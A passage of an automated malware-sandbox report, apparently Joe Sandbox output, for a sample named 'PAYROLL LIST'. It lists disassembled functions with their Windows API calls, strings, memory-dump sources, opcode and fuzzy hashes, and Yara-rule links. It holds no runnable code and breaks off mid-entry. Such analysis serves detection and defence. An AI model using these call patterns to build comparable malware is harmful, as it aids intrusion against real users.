InternetCloseHandle.WININET(00000000), ref: 00A7449E

Part of subcall function 00A75052: GetLastError.KERNEL32(?,?,00A743CC,00000000,00000000,00000001), ref: 00A75067

Strings

, xrefs: 00A74450

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 74983d83c1bb59c327189cc4137d8dcc3bdf95eac48f71b3a5c33b0b44f2c9ac
Instruction ID: 40fdb28d71cb4103b477bb43a7757fcb44798e53624515ab9d280e0000d8b4c3
Opcode Fuzzy Hash: 74983d83c1bb59c327189cc4137d8dcc3bdf95eac48f71b3a5c33b0b44f2c9ac
Instruction Fuzzy Hash: B3218EB2600208BFE7119FA4CD85EBFB6FCEB49758F10C01AF14AA2140EB748D05A770

Function 00A890E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A3D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A3D1BA
Part of subcall function 00A3D17C: GetStockObject.GDI32(00000011), ref: 00A3D1CE
Part of subcall function 00A3D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A3D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A8915C
LoadLibraryW.KERNEL32(?), ref: 00A89163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A89178
DestroyWindow.USER32(?), ref: 00A89180

Strings

SysAnimate32, xrefs: 00A89137

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 42a2b2d4907e687bd228787bf90932fd6713a82538992116b1ea279b09d08708
Instruction ID: df3825864b36204efb1aecfd5f5cf2aa5ac026222cdbdee117db52274860a6a6
Opcode Fuzzy Hash: 42a2b2d4907e687bd228787bf90932fd6713a82538992116b1ea279b09d08708
Instruction Fuzzy Hash: 1A21D171214206BBEF10AF64DC88EBB77ADEF99364F180718F951A21D0C731CC52A761

Function 00A69568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00A69588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A695B9
GetStdHandle.KERNEL32(0000000C), ref: 00A695CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00A69605

Strings

nul, xrefs: 00A69600

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 92fe756da48ae3d9e58a6cfef40b9e910120763d05888a6e9e7b916b9ff4e7ad
Instruction ID: 1f5e51c99876e084fdc05e5a8e6b5b47c80bd15d2a0e2048489e0f6b097431fc
Opcode Fuzzy Hash: 92fe756da48ae3d9e58a6cfef40b9e910120763d05888a6e9e7b916b9ff4e7ad
Instruction Fuzzy Hash: D3216074600206ABDB219F69DC05A9F7BFCAF89720F204A19F9A6D72D0D770D949CB10

Function 00A69634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00A69653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A69683
GetStdHandle.KERNEL32(000000F6), ref: 00A69694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00A696CE

Strings

nul, xrefs: 00A696C9

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 1237cdaf8fdd761e4258bfc3b3d1f91f78d95a13886a23dca3411d19d42e105e
Instruction ID: 2a55161c6b51bf874fa6b7468063b5fa4b3954b43acce8640fbad34b555f95af
Opcode Fuzzy Hash: 1237cdaf8fdd761e4258bfc3b3d1f91f78d95a13886a23dca3411d19d42e105e
Instruction Fuzzy Hash: 2D217F79600306ABDB209F69DC44E9B77FCAF45720F200A19F8A1E72D0EB70D845CB51

Function 00A6DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A6DB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A6DB5E
__swprintf.LIBCMT ref: 00A6DB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,00ABDC00), ref: 00A6DBB5

Strings

%lu, xrefs: 00A6DB71

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: af9eb1a02f357d376b88ecda86d2b3c89212818d66902b14f394e7d7067ccbfe
Instruction ID: d00c2e953edcd6cccf3e246482ee38a30acb554786128d59e88b98a64f762529
Opcode Fuzzy Hash: af9eb1a02f357d376b88ecda86d2b3c89212818d66902b14f394e7d7067ccbfe
Instruction Fuzzy Hash: 4A21A735A00109AFCB10EFA9DE85DEEBBB8EF89714B004079F505DB291DB71EA45CB61

Function 00A5C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A5C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00A5C84A
Part of subcall function 00A5C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A5C85D
Part of subcall function 00A5C82D: GetCurrentThreadId.KERNEL32 ref: 00A5C864
Part of subcall function 00A5C82D: AttachThreadInput.USER32(00000000), ref: 00A5C86B

GetFocus.USER32 ref: 00A5CA05

Part of subcall function 00A5C876: GetParent.USER32(?), ref: 00A5C884

GetClassNameW.USER32(?,?,00000100), ref: 00A5CA4E
EnumChildWindows.USER32(?,00A5CAC4), ref: 00A5CA76
__swprintf.LIBCMT ref: 00A5CA90

Strings

%s%d, xrefs: 00A5CA8A

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: 805dd53d4b170523c1b20867cefec9ac8639c197a15dc21bc54dbf8a474a0628
Instruction ID: c594ec8248fcc53016891e1bc45803bda8898036a05f8e1df96a8788c2760dd1
Opcode Fuzzy Hash: 805dd53d4b170523c1b20867cefec9ac8639c197a15dc21bc54dbf8a474a0628
Instruction Fuzzy Hash: 4811DF716003097BCF01BFA09D85FE93B79BB44725F008066FE09AA087DB74954ACB70

Function 00A81945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A819F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A81A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00A81B49
CloseHandle.KERNEL32(?), ref: 00A81BBF

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 7a120568648e7d10814717255d6a6454c5f57ee8b8d6606b1b1bc524026e8d65
Instruction ID: 6574ac81e1dcbd2ad6226f4b3c8cd32c3fc45ad56763017c792a5e7bcab29723
Opcode Fuzzy Hash: 7a120568648e7d10814717255d6a6454c5f57ee8b8d6606b1b1bc524026e8d65
Instruction Fuzzy Hash: 6D815E70600315ABDF10EF64C986BADBBF9AF08720F148459F905AF3C2E7B5A941CB90

Function 00A8E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00A8E1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 00A8E20D
IsDlgButtonChecked.USER32(?,00000001), ref: 00A8E248
GetWindowLongW.USER32(?,000000EC), ref: 00A8E269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A8E281

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: 7e8c19de50ee87c16db832831c5c7d3daced48907106229ad9c0a630f6f9e6f3
Instruction ID: 6c3ea2ad53cad12b81a5453574f5d5b47536eea399fd393de13ee6a3c337c506
Opcode Fuzzy Hash: 7e8c19de50ee87c16db832831c5c7d3daced48907106229ad9c0a630f6f9e6f3
Instruction Fuzzy Hash: 1961C234A40244EFDB20EF58C898FEA7BBAEF99300F044559F95A973A1C774AD41CB10

Function 00A61C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A61CB4
VariantClear.OLEAUT32(00000013), ref: 00A61D26
VariantClear.OLEAUT32(00000000), ref: 00A61D81
VariantClear.OLEAUT32(?), ref: 00A61DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A61E26

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 6d6ffb640aa5492983a1848be6b7011089c0e617d66dcc0e12d70e7dd883d566
Instruction ID: 8d8da5fdf8310e9c236f1ac5fc0c79c12b5bcef3c592f3c6801d9616bf4707e2
Opcode Fuzzy Hash: 6d6ffb640aa5492983a1848be6b7011089c0e617d66dcc0e12d70e7dd883d566
Instruction Fuzzy Hash: 7F513CB5A00209EFDB14CF58C884AAABBB8FF4D314B198559ED59DB341D730E951CFA0

Function 00A80688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2936C: __swprintf.LIBCMT ref: 00A293AB
Part of subcall function 00A2936C: __itow.LIBCMT ref: 00A293DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00A806EE
GetProcAddress.KERNEL32(00000000,?), ref: 00A8077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00A8079B
GetProcAddress.KERNEL32(00000000,?), ref: 00A807E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 00A807FB

Part of subcall function 00A3E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00A6A574,?,?,00000000,00000008), ref: 00A3E675
Part of subcall function 00A3E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00A6A574,?,?,00000000,00000008), ref: 00A3E699

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: ca55acbe3796495c97e5e2b1625973242ea282d69baebaf2b61cc128e2f199e3
Instruction ID: c3d16217cc7ab5002b8dac4b4cb09a605bd3e3ee6a6ccc8e9c99b6a6947eeeb8
Opcode Fuzzy Hash: ca55acbe3796495c97e5e2b1625973242ea282d69baebaf2b61cc128e2f199e3
Instruction Fuzzy Hash: 11514875A00615DFCB00EFA8D981DADB7B5FF59310F048069EA56AB392DB30ED46CB90

Function 00A82E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A83C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A82BB5,?,?), ref: 00A83C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A82EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A82F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A82F75
RegCloseKey.ADVAPI32(?,?), ref: 00A82FA1
RegCloseKey.ADVAPI32(00000000), ref: 00A82FAE

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: 7dd19985e38d3cf476a327aaa934c0270dff342343dd72113f205a111010b4da
Instruction ID: 8547d5263263cdf2b464dfaedc622ec0caf97b6fa20cc2d866998f4278fe3071
Opcode Fuzzy Hash: 7dd19985e38d3cf476a327aaa934c0270dff342343dd72113f205a111010b4da
Instruction Fuzzy Hash: EA514871208204AFD704EB68C991F6AB7F9FF88714F00882DF69697292DB30E915CB52

Function 00A8CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca8d9f29a5dc12a2c53d599406226b0ab23ca162c134958c530954ce3cc79188
Instruction ID: 1b0fdac68b765c7d6f1273c4b6f758512e08514388d6d94f3e2d27ade71d9417
Opcode Fuzzy Hash: ca8d9f29a5dc12a2c53d599406226b0ab23ca162c134958c530954ce3cc79188
Instruction Fuzzy Hash: 8641B239900215AFD720FB68CC44FA9BF79EB09320F140265F95AA72D1D734AD51DF60

Function 00A71206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A712B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00A712DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A7131C

Part of subcall function 00A2936C: __swprintf.LIBCMT ref: 00A293AB
Part of subcall function 00A2936C: __itow.LIBCMT ref: 00A293DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A71341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A71349

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: c64864c8f83d97145a13aa5419edc7a60fa44db197dcfc3a11aa8ec207065629
Instruction ID: d56c175beac641a4db564d5821d3b48f64c930638e2ccc942b3eac6c3d34a226
Opcode Fuzzy Hash: c64864c8f83d97145a13aa5419edc7a60fa44db197dcfc3a11aa8ec207065629
Instruction Fuzzy Hash: 4441FD35600115DFDB01EF68DA81AAEBBF5FF09714B14C0A9E94AAB3A1CB31ED01DB54

Function 00A3B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 00A3B64F
ScreenToClient.USER32(00000000,000000FF), ref: 00A3B66C
GetAsyncKeyState.USER32(00000001), ref: 00A3B691
GetAsyncKeyState.USER32(00000002), ref: 00A3B69F

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 06f1299099c5d4f4a89efb562fc9975af23bdbf025f7a0975b5252c461309e2e
Instruction ID: fc74be01a5a1dc2f0ea00be868d7b15b11e98c6efc95ca0d0f53781c3b07942b
Opcode Fuzzy Hash: 06f1299099c5d4f4a89efb562fc9975af23bdbf025f7a0975b5252c461309e2e
Instruction Fuzzy Hash: C0418D31604119FBCF15DF68C845AE9BBB5BF05324F10431AF86A96291CB30A990DFA1

Function 00A5B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00A5B369
PostMessageW.USER32(?,00000201,00000001), ref: 00A5B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00A5B41B
PostMessageW.USER32(?,00000202,00000000), ref: 00A5B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00A5B431

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 4d98cdd32a5a02b277d37bf9f1e643516f4373b434cb7d308474d9f6e25beca8
Instruction ID: d310f4133bb34bb002758f4b00e79481e485fe06220de1dbaf7842c7418fe39a
Opcode Fuzzy Hash: 4d98cdd32a5a02b277d37bf9f1e643516f4373b434cb7d308474d9f6e25beca8
Instruction Fuzzy Hash: C331CE7191021AEBDF14CFA8D94DADE3BB5FB05326F104229F861AA1D1C3B09919CBA0

Function 00A5DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00A5DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A5DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A5DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A5DC52
_wcsstr.LIBCMT ref: 00A5DC5C

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: a9a0aa85f0028a7e381c19b4977e34b37adb09abd2fa012bcc58af41dc5d7dd1
Instruction ID: 75288a7c21e2ac33ac0a1f83a63b0a5a07ec5619b1f69c4d110e1295d4372445
Opcode Fuzzy Hash: a9a0aa85f0028a7e381c19b4977e34b37adb09abd2fa012bcc58af41dc5d7dd1
Instruction Fuzzy Hash: 4F210472214200BBEB259F799D49E7F7BA9EF45751F104039FC0ADA191EBB1CC45D2A0

Function 00A8DE69 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00A3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A3B35F

GetWindowLongW.USER32(?,000000F0), ref: 00A8DEB0
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00A8DED4
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A8DEEC
GetSystemMetrics.USER32(00000004), ref: 00A8DF14
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00A73A1E,00000000), ref: 00A8DF32

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
